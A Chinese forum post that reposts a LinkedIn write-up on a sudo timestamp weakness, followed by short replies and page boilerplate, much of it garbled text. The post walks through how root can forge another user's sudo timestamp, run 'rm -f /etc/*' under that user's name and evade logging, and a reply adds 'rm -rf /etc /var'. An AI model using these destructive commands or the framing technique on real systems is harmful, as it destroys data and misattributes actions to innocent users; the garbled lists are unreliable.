为何您不该在关键UNIX/Linux系统上使用sudo-世界军事论坛-军事论坛-世界论坛网（电脑版）

送交者: 2017年11月24日03:26:58 于 [世界军事论坛] 发送悄悄话

以下是本人在Linkedin发的一个帖子：

I know sudo has many security issues along the years, and this is just one problem that's bad enough.
Here is the example attacker could use it to do bad things:
On one window:
root@analy:/$ tty
/dev/pts/1
root@analy:~$ su wgong
wgong@analy:/$

On another window:
root@analy:sudo$ pwd
/var/run/sudo
root@analy:sudo$ ls
_pam_timestamp_key caburiar davidn gagans jawadk nickc ponnusva sohenoor veeral zhoub
amirm chaumong eladn gambhisr jeesuna oswaldod qualys-scan sysadmin warrene
badris couttsa feroza gawalis jeffc pavlenkoi root taddm wgong
bobv covim forrestl greeffn minaa pomfretj silvae tothp zhens
root@analy:sudo$ touch wgong/1

Then on 1st window,
wgong@analy:/$ sudo bash
root@analy:/# rm -f /etc/*

Of course, you need to develop a simple C program to do the equivalent thing "su wgong" does to avoid being logged.

0%(0)

请注意，当wgong用户运行sudo时, - ausec 11/24/17 (658)

第一，超级用户想搞破坏还需这么麻烦？第二，sodo -v - 敌营十八年 11/24/17 (745)

回答 - ausec 11/24/17 (679)

cd / && rm -rf /etc /var 不露痕迹。 /无内容 - 敌营十八年 11/24/17 (592)

将/var删除会破坏这种攻击嫁祸于人的目的 - ausec 11/24/17 (601)

缂備焦顨愰幏锟� 闂佸憡鐔幏锟� (闂婎偄娲ら幊姗€鍩€椤掆偓椤︾敻濡撮敓锟�):

闁诲海顣幏锟� 闂佹椿鍣幏锟� (闂婎偄娲ら幊姗€鍩€椤掆偓椤︾敻濡撮敓锟�):

濠电偛顦崝宀勫船娴犲妫橀柟娈垮枟閺嗗繘鏌熸潏鐐

标题 (必选项):

内容 (选填项):

	实用资讯

北美最大最全的折扣机票网站
美国名厂保健品一级代理,花旗参,维他命,鱼油,卵磷脂,30天退货保证.买百免邮.

	发布新帖		论坛文库		忘记密码
	简洁版		修改密码		版主公告

一周点击热帖

更多>>

1	閺夆晜鐟ゅ▎銏＄鐎ｎ収娲ｅ娑樺缁辨繂顔忓┑鍥ㄧ彯闁活亞鍠愰埀顑惧劙缁拷 zt	eastwest
2	婵繐鎷�-50濡ゅ倹蓱缁斿鎮¤濞叉洟宕楁径娑氱閹煎洷鍡楃厓闁烩晜鐗曞▔鏇熷緞瑜庡Λ銈呅掗敓锟�	eastwest
3	濞戞挴鍋撳鑸电矆缁狅綁姊婚敓锟� 闁告婢樼€瑰啿顔忛弶鎴犲敤闁哄偆鍨板ḿ鑸殿瀲閹邦剙绲哄鐧告嫹闁哄牃鍋�	eastwest
4	濞戞搩鍘煎ù妤冧焊閸欐ḿ鐟归柛妯侯儏婵繐顔忛妸銉ｄ海闁挎稑濂旂粩瀛樻媴瀹ュ懏韬鐐层仒缁椼垹鈻介敓锟�	wada
5	j-36濡ゅ倹蓱缁斿寮查弶鎸庣	闁绘挸閰ｉ妶锟�
6	j-50濡ゅ倹蓱缁斿寮查弶鎸庣	闁绘挸閰ｉ妶锟�
7	閻犲洣鐒﹀畵渚€寮堕妷銈囧晩闁挎稐鐒﹂锟�-10濡炲鍋犵换鍐礃鎼淬倕鐒绘慨锝呯Х钘熺紓浣圭懄閼碉拷	eastwest
8	闁哄棗鐡ㄧ€规氨鎼鹃敓锟�100%闁挎稐绀侀崹浼村礆濮樺墽绀夌€瑰憡绻冨▍妯肩驳閸欍儳鍟婇柨娑虫嫹 z	eastwest
9	j-36闁哄倹婢樺ù锟�	闁绘挸閰ｉ妶锟�
10	j-36闁告牬浜滈妵妤呭箥閳ь剟骞€濠靛牊鐣遍弶鐑嗗墮闂嗗棛鎲撮敐澶婃珵	闁绘挸閰ｉ妶锟�

一周回复热帖

1	缂傚洤楠搁悰鐔煎箮椤愶附鑻熼柨娑欐皑缁躲劎鈧锚閹插磭绮旀担椋庣憮闁逛絻鍎婚鑽ゆ嫚椤栨艾鐏插☉鎿勬嫹	eastwest
2	婵炴搩鍨拌ぐ娑氱不閿涘嫭鍊為悹鎰缁辨繈寮悩宕囥€婇柟鍨尭鐢洦绋夐鐐寸闂侇偆濮鹃崺锟�	eastwest
3	闁诡収鍘奸弸鈺傜婵犲倸瀣€缂佹鍓欏畷鍕▔閸ワ箓鍤嬮柛妤佹緲鐎硅櫕绂嶉崫鍕箒闁告帡顣﹂懙鎴﹀炊閿燂拷	wada
4	闂傚啫銇樼粭锟�: 闁炽儲绮岄々褔寮稿⿰鍠版帡寮ㄩ幆褍鏅藉ù鐘差儏閸欏棝宕￠弶鍨唺鐎瑰憡娼欓悢鈧�	eastwest
5	闁哄牃鍋撳┑鍌滄櫕濞堟垶鎯旈弬娆惧殸闁挎稑鑻銊╁及椤栨粎鏋傚☉鏂款儎缁楀鎮堕崱顓犵	wada
6	閺夆晜鐟ゅ▎銏＄鐎ｎ収娲ｅ娑樺缁辨繂顔忓┑鍥ㄧ彯闁活亞鍠愰埀顑惧劙缁拷 zt	eastwest
7	濞戞搩鍘煎﹢鍛村触閿曚胶宕ラ柤绋挎川缁躲劑寮ぐ鎺嗗亾閼奸鏀介悹銊﹀濡叉鎸忛崶褍鐏查柕鍡忓亾闁绘鎷�	omegago
8	濞戞搩鍘煎ù妤冩嫻闁垮鍎�21濞存粏娉曢懗宀勫捶閸☆厾绀夊☉鎿冨幖濞存宕欓悜妯荤參鐎规悶鍎荤槐锟�	闁告艾顦遍懗灞惧緞濮橆剚绾俊顐嫹
9	闁稿繐纾埣锝夋⒓缂佹ɑ鐒藉☉鎿冨幖濞存鎮滈悢璇残″〒姘☉缁ㄦ煡鏁嶅畝鈧欢銊﹀垔閹烘挸顎撻煫鍥锋嫹	eastwest
10	濞戞搩鍘煎ù妤呭矗閺嵮呯箒EUV闁瑰灈鍋撻柡鍫灦閸ｅ摜鎲版担铏瑰磹闁活喛鎻槐婵嬫⒓閹稿孩鐒垮Δ鐧告嫹	eastwest

历史上的今天：回复热帖

2016:	中国第一次没收新加坡的军用设备：做掉
2016:	彭丽媛舅告别式》采访侧记－盐商之子变
2015:	这新闻，简单的过分了（图）
2015:	土耳其在边境地区击落入侵战机俄国防部
2014:	永暑岛就地取土能填多大？
2014:	创立中国人自己的宗教，抗衡西方的各种
2013:	陸劃防空識別區美国务院、白宫和五角大
2013:	BBC: 日本“严重抗议”中国设东海防空识
2012:	军报：首批5名飞行员驾歼15完成在航母起
2012:	官方J15起降航母高清照片出炉了！！！